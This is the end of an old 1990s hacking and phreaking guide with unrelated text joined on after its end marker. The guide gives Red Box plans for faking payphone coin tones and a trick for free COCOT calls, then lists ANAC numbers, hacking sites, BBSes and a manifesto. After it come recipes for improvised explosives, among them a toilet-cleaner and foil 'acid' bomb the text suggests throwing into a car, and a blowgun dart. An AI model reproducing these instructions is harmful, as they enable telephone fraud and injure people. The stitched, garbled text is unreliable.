DLOC Box                        create party line
Gold Box                        dialout router
Infinity Box                    remote activated phone tap
Jack Box                        touch-tone key pad
Light Box                       in-use light
Lunch Box                       AM transmitter
Magenta Box                     connect remote phone line to another
Mauve Box                       phone tap without cutting into the line
Neon Box                        external microphone
Noise Box                       creates line noise
Olive Box                       external ringer
Party Box                       creates party line
Pearl Box                       tone generator
Pink Box                        creates party line
Purple Box                      hold button
Rainbow Box                     kill trace
Razz Box                        tap neighbors phone
Rock Box                        add music to phone line
Scarlet Box                     causes interference
Silver Box                      create DTMF tones for A,B,C, and D
Static Box                      raises voltage on phone line
Switch Box                      add services 
Tan Box                         phone conversation recorder
TV Cable Box                    see sound waves on TV
Urine Box                       create disturbance on phone headset
Violet Box                      stop payphone from hanging up
White Box                       DTMF key pad 
Yellow Box                      add line extension
F. Box Plans 
The Red Box is the main tool that you will use so I have included the Red Box plans. The other box plans can be downloaded from the Internet. 

Red Box: 

There are two ways that you can make a Red Box: 

One is to go to Radio Shack and buy a tone dialer and a 6.5536Mhz crystal. (If Radio Shack doesn't have the crystal, you can order them from the electronics companies that I have listed at the end of this section.) Open up the tone dialer and replace the existing crystal (big, shiny, metal thing labeled "3.579545Mhz") with the 6.5536Mhz crystal. Now, close it up. You have a red box. To use it for long distance calls play the tones that add up to the amount of money that the operator requests. For a 25 cents tone press 5 *'s. For a 10 cents tone press 3 *'s. For a 5 cents tone press 1 *. And, the second way, which is a much easier method, is to get the Red Box tones from a phreaking program, such as: Omnibox, or Fear's Phreaker Tools. Play the tones as you hold a microcassette recorder about 1-inch away from your computer speakers, and record the tones. The Red Box only works on public telephones, it does not work on COCOT's. (Defined in next section.) It makes the telephone think that you have put money in. Red Boxes do not work on local calls because the phone is not using ACTS (Automated Coin Toll System), unless you call the operator and have her place the call for you. You tell her the number that you want to dial and then when she asks you to put in your money, play the tones. If she asks you why you need her to place the call tell her that one of the buttons is smashed in or something like that. You now have and know how to use a Red Box! 

Electronics Companies: 

Alltronics 
2300 Zanker Road 
San Jose, CA 95131 
(408)943-9774 -Voice- 
(408)943-9776 -Fax- 

Blue Saguaro 
P.O. Box 37061 
Tucson, AZ 85740 

Mouser 
(800)346-6873 

Unicorn Electronics 
10000 Canoga Ave. Unit C-2 
Chatsworth, CA 91311 
1-800-824-3432 

G. Free calling from COCOT's 

First of all, COCOT stands for "Customer Owned Customer Operated Telephone". These are most likely to be found at resteraunts, amusement parks, etc. All you have to do to make a free call from a COCOT is dial a 1-800 number (they let you do this for free), say some bullshit and get them to hang up on you. Stay on the line after they hang up, then dial the number that you want to call. This may not work by the time you read this because COCOT owners are becoming more aware of us every day. 

H. ANAC numbers 

ANAC stands for "Automated Number Announcment Circuit". In other words, you call the ANAC number in your area and it tells you the number that you are calling from. This is useful when Beige Boxing, or hooking your modem up to other phone lines, to find out what number you are using. The "?" are substituted for unknown numbers. Do some scanning to find them out. Here are the ANAC numbers for the U.S.A. with their area code, and the only one I knew of in the U.K.: 

U.S.A.:

Area Code:                              ANAC Number:

201                                     958
202                                     811
203                                     970
205                                     300-222-2222
205                                     300-555-5555
205                                     300-648-1111
205                                     300-765-4321
205                                     300-798-1111
205                                     300-833-3333
205                                     557-2311
205                                     811
205                                     841-1111
205                                     908-222-2222
206                                     411
207                                     958
209                                     830-2121
209                                     211-9779
210                                     830
212                                     958
213                                     114
213                                     1223
213                                     211-2345
213                                     211-2346
213                                     760-2???
213                                     61056
214                                     570
214                                     790
214                                     970-222-2222
214                                     970-611-1111
215                                     410-????
215                                     511
215                                     958
216                                     200-????
216                                     331
216                                     959-9968
217                                     200-???-????
219                                     550
219                                     559
301                                     958-9968
310                                     114
310                                     1223
310                                     211-2345
310                                     211-2346
312                                     200
312                                     290
312                                     1-200-8825
312                                     1-200-555-1212
313                                     200-200-2002
313                                     200-222-2222                                    
313                                     200-???-????
313                                     200200200200200
314                                     410-????
315                                     953
315                                     958
315                                     998
317                                     310-222-2222
317                                     559-222-2222
317                                     743-1218
334                                     5572411
334                                     5572311
401                                     200-200-4444
401                                     222-2222
402                                     311
404                                     311
404                                     940-???-????
404                                     940
405                                     890-7777777                                     
405                                     897
407                                     200-222-2222
408                                     300-???-????
408                                     760
408                                     940
409                                     951
409                                     970-????
410                                     200-6969
410                                     200-555-1212
410                                     811
412                                     711-6633
412                                     711-4411
412                                     999-????
413                                     958
413                                     200-555-5555
414                                     330-2234
415                                     200-555-1212
415                                     211-2111
415                                     2222
415                                     640
415                                     760-2878
415                                     7600-2222
419                                     311
502                                     200-2222222
502                                     997-555-1212
503                                     611
503                                     999
504                                     99882233
504                                     201-269-1111
504                                     998
504                                     99851-0000000000
508                                     958
508                                     200-222-1234
508                                     200-222-2222
508                                     26011
509                                     560
510                                     760-1111
512                                     830
512                                     970-????
515                                     5463
515                                     811
516                                     958
516                                     968
517                                     200-222-2222
517                                     200200200200200
518                                     511
518                                     997
518                                     998
603                                     200-222-2222                                    
606                                     997-555-1212
606                                     711
607                                     993
609                                     958
610                                     958
610                                     958-4100
612                                     511
614                                     200
614                                     517
615                                     200200200200200
615                                     2002222222
615                                     830
616                                     200-222-2222
617                                     200-222-1234
617                                     200-222-2222
617                                     200-444-4444
617                                     220-2622
617                                     958
618                                     200-???-????
618                                     930
619                                     211-2001
619                                     211-2121
703                                     811
704                                     311
707                                     211-2222
708                                     1-200-555-1212
708                                     1-200-8825
708                                     200-6153
708                                     724-9951
708                                     356-9646
713                                     380
713                                     970-????
713                                     811
714                                     114
714                                     211-2121
714                                     211-2222
716                                     511
716                                     990
717                                     958
718                                     958
802                                     2-222-222-2222
802                                     200-222-2222
802                                     1-700-222-2222
802                                     111-2222
805                                     114
805                                     211-2345
805                                     211-2346
805                                     830
806                                     970-????
810                                     200200200200200
812                                     410-555-1212
813                                     311
815                                     200-???-????
817                                     290
817                                     211
818                                     970-611-1111
818                                     1223
818                                     211-2345
903                                     211-2346
904                                     970-611-1111
906                                     200-222-222
907                                     1-200-222-2222
907                                     811
908                                     958
910                                     200
910                                     311
910                                     988
914                                     990-1111
915                                     970-????
916                                     211-2222
916                                     461
919                                     200
919                                     711

U.K.:

175

AUSTRALIA:

19123
1800801234
III. REFERENCE 
A. Hacking and phreaking WWW sites 

Here is a list of some World Wide Web sites that contain hacking, phreaking, computer, virus, carding, security, etc. material: 

Site Address: 

http://www.outerlimits.net/lordsome/index.html (Hacker's Layer)
http://web2.airmail.net/km/hfiles/free.htm     (Hacker's Hideout)
http://resudox.net/bio/novell.html
http://www.louisville.edu/wrbake01/hack2.html
http://www.intersurf.com/~materva/files.html
http://hightop.nrl.navy.mil/rainbow.html
http://www.rit.edu/~jmb8902/hacking.html
http://www.spatz.com/pecos/index.html
http://pages.prodigy.com/FL/dtgz94a/files2.html
http://www.2600.com                                     (alt.2600)
http://att.net/dir800
http://draco.centerline.com:8080/~franl/crypto.html
http://everest.cs.ucdavis.edu/Security.html
http://ice-www.larc.nasa.gov/WWW/security.html
http://lOpht.com                                                (lOpht)
http://lOpht.com/~oblivion/IIRG.html
http://underground.org
http://www.alw.nih.gov/WWW/security.html
http://www.aspentec.com/~frzmtdb/fun/hacker.html
http://www.cis.ohi-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
http://www.cs.tufts.ed/~mcable/cypher/alerts/alerts.html
http://www.engin.umich.edu/~jgotts/underground/boxes.html
http://www.etext.org/Zines
http://www.inderect.com/www/johnk/
http://www.mgmua.com/hackers/index.html
http://www.paranoia.com/mthreat
http://www.paranoia.com/astrostar/fringe.html
http://www.umcc.umich.edu/~doug/virus-faq.html
http://www.wired.com
B. Good hacking and phreaking text files 
All of these files are available by download from the Internet. 

File Name: 

A Novice's Guide To Hacking 
Alt.2600 Hack Faq 
The Hacker's Handbook 
The Official Phreaker's Manual 
Rainbow Books (Listed in Section D.) 
The Hacker Crackdown 
Computer Hackers: Rebels With A Cause 
The Legion Of Doom Technical Journals 
The Ultimate Beginner's Guide To Hacking And Phreaking (Of course!) 

C. Hacking and phreaking Newsgroups 

alt.2600 
alt.2600.hope.tech 
alt.cellular 
alt.cellular-phone-tech 
alt.comp.virus 
alt.cracks 
alt.cyberpunk 
alt.cyberspace 
alt.dcom.telecom 
alt.fan.lewiz 
alt.hackers 
alt.hackintosh 
alt.hackers.malicious 
alt.security 

D. Rainbow Books 

The Rainbow Books are a series of government evaluations on various things related to computer system security. You can get all of the existing Rainbow Books free and if you ask to be put on their mailing list you will get each new one as it comes out. Just write to the address or call the number below: 

Infosec Awareness Division 
ATTN: x711/IAOC 
Fort George G. Meade, MD 20755-6000 

or call: (800)688-6115 

Here is the list of all the Rainbow Books and their descriptions: 

Color:                  Description:

Orange 1                D.O.D. Trusted Computer Systems
Green                   D.O.D. Password Management
Yellow                  Computer Security Requirements
Yellow 2                Computer Security Requirements
Tan                     Understanding Audit In Trusted Systems
Bright Blue             Trusted Product Evaluation
Neon Orange             Understanding Discretionary Access
Teal Green              Glossary Of Computer Terms
Orange 2                Understanding Configurations
Red                     Interpretation Of Evaluation
Burgundy                Understanding Design Documentation
Dark Lavender           Understanding Trusted Distrobution
Venice Blue             Computer Security Sub-Systems
Aqua                    Understanding Security Modeling
Dark Red                Interpretations Of Environments
Pink                    Rating Maintenence Phase
Purple                  Formal Verification Systems
Brown                   Understanding Trusted Facilities
Yellow-Green            Writing Trusted Facility Manuals
Light Blue              Understanding Identification And Authentication In Trusted Systems
Blue                    Product Evaluation Questionaire
Gray                    Selecting Access Control List
Lavander                Data Base Management Interpretation
Yellow 3                Understanding Trusted Recovery
Bright Orange           Understanding Security Testing
Purple 1                Guide To System Procurement
Purple 2                Guide To System Procurement
Purple 3                Guide To System Procurement
Purple 4                Guide To System Procurement
Green                   Understanding Data Remanence
Hot Peach               Writing Security Features
Turquiose               Understanding Information Security 
Violet                  Controlled Access Protection 
Light Pink              Understanding Covert Channels
E. Cool hacking and phreaking magazines 
Phrack Magazine 
2600 Magazine 
Tap Magazine 
Phantasy Magazine 

F. Hacking and phreaking movies 

Movie: 

Hackers 
War Games 

G. Hacking and phreaking Gopher sites 

Address:

ba.com
csrc.ncsl.nist.gov
gopher.acm.org
gopher.cpsr.org
gopher.cs.uwm
gopher.eff.org
oss.net
spy.org
wiretap.spies.com
H. Hacking and phreaking Ftp sites 
Address:

2600.com
agl.gatech.edu/pub
asylum.sf.ca.us
clark.net/pub/jcase
ftp.armory.com/pub/user/kmartind
ftp.armory.com/pub/user/swallow
ftp.fc.net/pub/defcon/BBEEP
ftp.fc.net/pub/phrack
ftp.giga.or.at/pub/hacker
ftp.lava.net/users/oracle
ftp.microserve.net/ppp-pop/strata/mac
ftp.near.net/security/archives/phrack
ftp.netcom.com/pub/br/bradelym
ftp.netcom.com/pub/daemon9
ftp.netcom.com/pub/zz/zzyzx
ftp.primenet.com/users/k/kludge
I. Hacking and phreaking BBS's 
BBS's are Bulletin Board Systems on which hackers and phreakers can post messages to each other. Here is a list of some BBS's that I know of. If you know of any other BBS's, please E-Mail me via the A.S.H. E-Mail address. Also, Please note that some of these may be old and not running. 

Area Code:              Phone Number:                   Name:

203                     832-8441                        Rune Stone
210                     493-9975                        The Truth Sayer's Domain
303                     516-9969                        Hacker's Haven
315                     656-5135                        Independent Nation
315                     656-5135                        UtOPiA            
617                     855-2923                        Maas-Neotek
708                     676-9855                        Apocalypse 2000
713                     579-2276                        KOdE AbOdE
806                     747-0802                        Static Line
908                     526-4384                        Area 51
502                     499-8933                        Blitzkrieg
510                     935-5845                        ...Screaming Electron
408                     747-0778                        The Shrine
708                     459-7267                        The Hell Pit
415                     345-2134                        Castle Brass
415                     697-1320                        7 Gates Of Hell
J. Cool hackers and phreakers 
Yes there are many, many, cool hackers and phreakers out there, but these are some that helped me to get this file out on the Internet. I did not list a few people because I only knew their real name, and I don't want to use their real name without their permission. 

Handle: 

Silicon Toad 
Logik Bomb/Net Assasin 
oleBuzzard 
Lord Somer 
Weezel 

Thanks for your help guys. 

K. Hacker's Manifesto 

"This is our world now...the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheep if it wasn't run by profiteering gluttons, and you call us criminals. We explore...and you call us criminals. We exist without skin color, without nationality, without religious bias...and you call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to make us believe it is for our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this individual, but you can't stop us all...after all, we're all alike." 

+++The Mentor+++ 

L. Happy hacking! 

Be careful and have fun. Remember to keep your eye out for the next volume of The Ultimate Beginner's Guide To Hacking And Phreaking and the Legion Of the Apocalypse W.W.W. page. Oh, and keep looking for our on-line magazine, too, it should be coming out soon. Well, I hope you enjoyed the file and found it informative. I also hope that I helped get you started in hacking and phreaking. 

"The Revelation is here."
*-Revelation-*
LOAASH
EOFCopyright© 1997 - 1998 ZoomEasy Grenades/Rockets
 
Items Needed:
White Out Pen or Bottle full of white out
Small wooden matches
 
Directions:
Cram alot of match heads into the opening of the white out bottle for the pen take off the top then cram the matches in to pen's opening. To ignite just light the match heads and it will either explode or launch.take a 2 liter bottle and put lil rolled up balls of aluminum foil in it (about up to the label in the bottle) take The Works toilet bowl cleaner (found at K-Mart) and pour about 1 1/2 cups in. close lid tightly. wait for it to start to smoke then throw. (very fun to duct tape G.I joes to it and watch them blow apart)(or u could throw in a backseat of a car and blow acid all over)-A regular sized straw, that doesn't bend
-Some of those pin/needles with the small colored balls on the end
-A spool of thread

You simply tie three of four 1/2 inch or so, strands of thread around the end of the pin, so that the colored ball keeps it from sliding off. Then you just insert your improvised darts into the end of the straw and blow. Very simple concept, and lots of fun in the classroom
